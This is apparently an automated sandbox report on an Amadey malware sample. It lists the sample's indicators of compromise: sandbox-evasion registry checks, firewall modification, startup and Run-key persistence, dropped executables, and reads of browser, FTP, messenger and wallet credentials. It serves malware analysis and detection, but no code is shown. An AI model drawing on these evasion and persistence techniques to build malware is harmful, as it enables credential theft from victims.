amadey | 09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330

Virtualization/Sandbox Evasion

Processes:

09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exeexplorgu.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorgu.exe

Blocklisted process makes network request 2 IoCs

Processes:

rundll32.exerundll32.exe

flow pid process

50 4332 rundll32.exe
56 4032 rundll32.exe
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 4 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

pid process

5956 netsh.exe
3624 netsh.exe
1504 netsh.exe
2360 netsh.exe

flow	pid	process
50	4332	rundll32.exe
56	4032	rundll32.exe

pid	process
5956	netsh.exe
3624	netsh.exe
1504	netsh.exe
2360	netsh.exe

Checks BIOS information in registry 2 TTPs 5 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exeexplorgu.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorgu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorgu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Drops startup file 13 IoCs

Processes:

installutil.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ppD59zZZMfwbB5qsmUlSnwrk.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4UAVsGulYRjG4sEm7RXlfBA3.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cL5nZVOJI2cBv2oWIYny1inr.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d93jRdHKS1KNlGXo9tqrBrZA.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GmmkwDR3Jrq7Cg8atP2xMvc4.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ia22pMoOGpVm6ShKVC3APUEn.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N88N0pR7BLzdtkaCcLRTLFGM.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1ljJLWEznLjcnXSmT5HTFu3u.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gFceYqAZ0PWtZL6nqrPbkZd2.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kkhdoZah7I3NOmsWgb1qgPlY.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\i80Hrf2t3sy9X0aJBcapXU5I.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\09nnKERAyDj1ZmPXvoj8jN3b.bat	installutil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NJQ1tMCFjBNJgItvx5enL4NW.bat	installutil.exe

Executes dropped EXE 35 IoCs

Processes:

explorgu.exefile300un.exeq9ftR3MnZJS329eRcXixlt8T.exePlu2Yra1DcZOYdQ6S0X9boNc.exePlu2Yra1DcZOYdQ6S0X9boNc.tmpseniorflashdecompiler.exeseniorflashdecompiler.exeRDOdP6RHoxxbbJZvBW0nzcZC.exe9YnX9TIPmfCMcUr7DOBqr4ym.exeYqnYErQDqyvWk0WfwDMsdpx4.exeu2tc.0.exeCT7SLFhM3W2nqplaBtJ10Bf4.exesyncUpd.exeBroomSetup.exeMWqP5e651UE727D9aFjdApYi.exe9YnX9TIPmfCMcUr7DOBqr4ym.exeYqnYErQDqyvWk0WfwDMsdpx4.exeBOWXpT9EMatm7T8qv30PJ1Fe.exeBOWXpT9EMatm7T8qv30PJ1Fe.exeBOWXpT9EMatm7T8qv30PJ1Fe.exeBOWXpT9EMatm7T8qv30PJ1Fe.exeBOWXpT9EMatm7T8qv30PJ1Fe.exeu2tc.1.exe9Z26EcBsLLBcqwnDFb4WtGQK.exeBLHU0RlzPVoO4o5n4SRKk03P.exeVEfRE0FVJNYHI28gmqs3eJxU.exeInstall.exeInstall.exeBLHU0RlzPVoO4o5n4SRKk03P.exe9Z26EcBsLLBcqwnDFb4WtGQK.execsrss.exeAssistant_108.0.5067.20_Setup.exe_sfx.exeassistant_installer.exeassistant_installer.exeinjector.exe

pid	process
904	explorgu.exe
4720	file300un.exe
3648	q9ftR3MnZJS329eRcXixlt8T.exe
3324	Plu2Yra1DcZOYdQ6S0X9boNc.exe
3256	Plu2Yra1DcZOYdQ6S0X9boNc.tmp
1556	seniorflashdecompiler.exe
3976	seniorflashdecompiler.exe
1844	RDOdP6RHoxxbbJZvBW0nzcZC.exe
1936	9YnX9TIPmfCMcUr7DOBqr4ym.exe
3356	YqnYErQDqyvWk0WfwDMsdpx4.exe
2736	u2tc.0.exe
4792	CT7SLFhM3W2nqplaBtJ10Bf4.exe
3584	syncUpd.exe
2688	BroomSetup.exe
3272	MWqP5e651UE727D9aFjdApYi.exe
3880	9YnX9TIPmfCMcUr7DOBqr4ym.exe
2800	YqnYErQDqyvWk0WfwDMsdpx4.exe
4224	BOWXpT9EMatm7T8qv30PJ1Fe.exe
1544	BOWXpT9EMatm7T8qv30PJ1Fe.exe
4756	BOWXpT9EMatm7T8qv30PJ1Fe.exe
3124	BOWXpT9EMatm7T8qv30PJ1Fe.exe
1836	BOWXpT9EMatm7T8qv30PJ1Fe.exe
5060	u2tc.1.exe
3168	9Z26EcBsLLBcqwnDFb4WtGQK.exe
4952	BLHU0RlzPVoO4o5n4SRKk03P.exe
2632	VEfRE0FVJNYHI28gmqs3eJxU.exe
1136	Install.exe
4964	Install.exe
5936	BLHU0RlzPVoO4o5n4SRKk03P.exe
6024	9Z26EcBsLLBcqwnDFb4WtGQK.exe
5560	csrss.exe
3280	Assistant_108.0.5067.20_Setup.exe_sfx.exe
6076	assistant_installer.exe
5932	assistant_installer.exe
5312	injector.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exeexplorgu.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Wine	09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe
Key opened	\REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Wine	explorgu.exe

Loads dropped DLL 17 IoCs

Processes:

Plu2Yra1DcZOYdQ6S0X9boNc.tmprundll32.exerundll32.exeCT7SLFhM3W2nqplaBtJ10Bf4.exeBOWXpT9EMatm7T8qv30PJ1Fe.exeBOWXpT9EMatm7T8qv30PJ1Fe.exerundll32.exeu2tc.0.exeBOWXpT9EMatm7T8qv30PJ1Fe.exeBOWXpT9EMatm7T8qv30PJ1Fe.exeBOWXpT9EMatm7T8qv30PJ1Fe.exeassistant_installer.exeassistant_installer.exe

pid	process
3256	Plu2Yra1DcZOYdQ6S0X9boNc.tmp
4048	rundll32.exe
4332	rundll32.exe
4792	CT7SLFhM3W2nqplaBtJ10Bf4.exe
4792	CT7SLFhM3W2nqplaBtJ10Bf4.exe
4224	BOWXpT9EMatm7T8qv30PJ1Fe.exe
1544	BOWXpT9EMatm7T8qv30PJ1Fe.exe
4032	rundll32.exe
2736	u2tc.0.exe
2736	u2tc.0.exe
4756	BOWXpT9EMatm7T8qv30PJ1Fe.exe
3124	BOWXpT9EMatm7T8qv30PJ1Fe.exe
1836	BOWXpT9EMatm7T8qv30PJ1Fe.exe
6076	assistant_installer.exe
6076	assistant_installer.exe
5932	assistant_installer.exe
5932	assistant_installer.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe	upx
C:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exe	upx
C:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exe	upx
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\BOWXpT9EMatm7T8qv30PJ1Fe.exe	upx
behavioral2/memory/4756-615-0x0000000000FD0000-0x0000000001508000-memory.dmp	upx
C:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exe	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

9YnX9TIPmfCMcUr7DOBqr4ym.exeBLHU0RlzPVoO4o5n4SRKk03P.exe9Z26EcBsLLBcqwnDFb4WtGQK.exeYqnYErQDqyvWk0WfwDMsdpx4.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	9YnX9TIPmfCMcUr7DOBqr4ym.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	BLHU0RlzPVoO4o5n4SRKk03P.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	9Z26EcBsLLBcqwnDFb4WtGQK.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	YqnYErQDqyvWk0WfwDMsdpx4.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 4 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

BOWXpT9EMatm7T8qv30PJ1Fe.exeBOWXpT9EMatm7T8qv30PJ1Fe.exe

description	ioc	process
File opened (read-only)	\??\D:	BOWXpT9EMatm7T8qv30PJ1Fe.exe
File opened (read-only)	\??\F:	BOWXpT9EMatm7T8qv30PJ1Fe.exe
File opened (read-only)	\??\D:	BOWXpT9EMatm7T8qv30PJ1Fe.exe
File opened (read-only)	\??\F:	BOWXpT9EMatm7T8qv30PJ1Fe.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

6 pastebin.com
9 pastebin.com
11 bitbucket.org
21 bitbucket.org

flow	ioc
6	pastebin.com
9	pastebin.com
11	bitbucket.org
21	bitbucket.org

Drops file in System32 directory 17 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeInstall.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exeexplorgu.exe

pid process

1884 09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe
904 explorgu.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

file300un.exeRDOdP6RHoxxbbJZvBW0nzcZC.exe

description	pid	process	target process
PID 4720 set thread context of 720	4720	file300un.exe	installutil.exe
PID 1844 set thread context of 652	1844	RDOdP6RHoxxbbJZvBW0nzcZC.exe	RegAsm.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 4 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

Processes:

9Z26EcBsLLBcqwnDFb4WtGQK.exe9YnX9TIPmfCMcUr7DOBqr4ym.exeYqnYErQDqyvWk0WfwDMsdpx4.exeBLHU0RlzPVoO4o5n4SRKk03P.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	9Z26EcBsLLBcqwnDFb4WtGQK.exe
File opened (read-only)	\??\VBoxMiniRdrDN	9YnX9TIPmfCMcUr7DOBqr4ym.exe
File opened (read-only)	\??\VBoxMiniRdrDN	YqnYErQDqyvWk0WfwDMsdpx4.exe
File opened (read-only)	\??\VBoxMiniRdrDN	BLHU0RlzPVoO4o5n4SRKk03P.exe

Drops file in Windows directory 10 IoCs

Processes:

YqnYErQDqyvWk0WfwDMsdpx4.exeBLHU0RlzPVoO4o5n4SRKk03P.exe9Z26EcBsLLBcqwnDFb4WtGQK.exeschtasks.exe09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe9YnX9TIPmfCMcUr7DOBqr4ym.exe

description	ioc	process
File created	C:\Windows\rss\csrss.exe	YqnYErQDqyvWk0WfwDMsdpx4.exe
File opened for modification	C:\Windows\rss	BLHU0RlzPVoO4o5n4SRKk03P.exe
File created	C:\Windows\rss\csrss.exe	BLHU0RlzPVoO4o5n4SRKk03P.exe
File created	C:\Windows\rss\csrss.exe	9Z26EcBsLLBcqwnDFb4WtGQK.exe
File created	C:\Windows\Tasks\bNoYxGgNiGReyhFIfY.job	schtasks.exe
File opened for modification	C:\Windows\rss	9Z26EcBsLLBcqwnDFb4WtGQK.exe
File created	C:\Windows\Tasks\explorgu.job	09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe
File opened for modification	C:\Windows\rss	YqnYErQDqyvWk0WfwDMsdpx4.exe
File opened for modification	C:\Windows\rss	9YnX9TIPmfCMcUr7DOBqr4ym.exe
File created	C:\Windows\rss\csrss.exe	9YnX9TIPmfCMcUr7DOBqr4ym.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

5164 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
5164	sc.exe

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5068	652	WerFault.exe	RegAsm.exe
4500	652	WerFault.exe	RegAsm.exe
5040	3648	WerFault.exe	q9ftR3MnZJS329eRcXixlt8T.exe
4876	2736	WerFault.exe	u2tc.0.exe
2780	3584	WerFault.exe	syncUpd.exe

NSIS installer 3 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\CT7SLFhM3W2nqplaBtJ10Bf4.exe	nsis_installer_2
C:\Users\Admin\Pictures\CT7SLFhM3W2nqplaBtJ10Bf4.exe	nsis_installer_2
C:\Users\Admin\Pictures\CT7SLFhM3W2nqplaBtJ10Bf4.exe	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

u2tc.1.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2tc.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2tc.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2tc.1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

u2tc.0.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u2tc.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u2tc.0.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4276 schtasks.exe
6076 schtasks.exe
1548 schtasks.exe
5536 schtasks.exe
3700 schtasks.exe

pid	process
4276	schtasks.exe
6076	schtasks.exe
1548	schtasks.exe
5536	schtasks.exe
3700	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

9YnX9TIPmfCMcUr7DOBqr4ym.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeYqnYErQDqyvWk0WfwDMsdpx4.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time"	9YnX9TIPmfCMcUr7DOBqr4ym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	9YnX9TIPmfCMcUr7DOBqr4ym.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	9YnX9TIPmfCMcUr7DOBqr4ym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	9YnX9TIPmfCMcUr7DOBqr4ym.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	YqnYErQDqyvWk0WfwDMsdpx4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time"	YqnYErQDqyvWk0WfwDMsdpx4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	9YnX9TIPmfCMcUr7DOBqr4ym.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	YqnYErQDqyvWk0WfwDMsdpx4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	YqnYErQDqyvWk0WfwDMsdpx4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time"	YqnYErQDqyvWk0WfwDMsdpx4.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	9YnX9TIPmfCMcUr7DOBqr4ym.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	9YnX9TIPmfCMcUr7DOBqr4ym.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	9YnX9TIPmfCMcUr7DOBqr4ym.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time"	YqnYErQDqyvWk0WfwDMsdpx4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	9YnX9TIPmfCMcUr7DOBqr4ym.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time"	YqnYErQDqyvWk0WfwDMsdpx4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
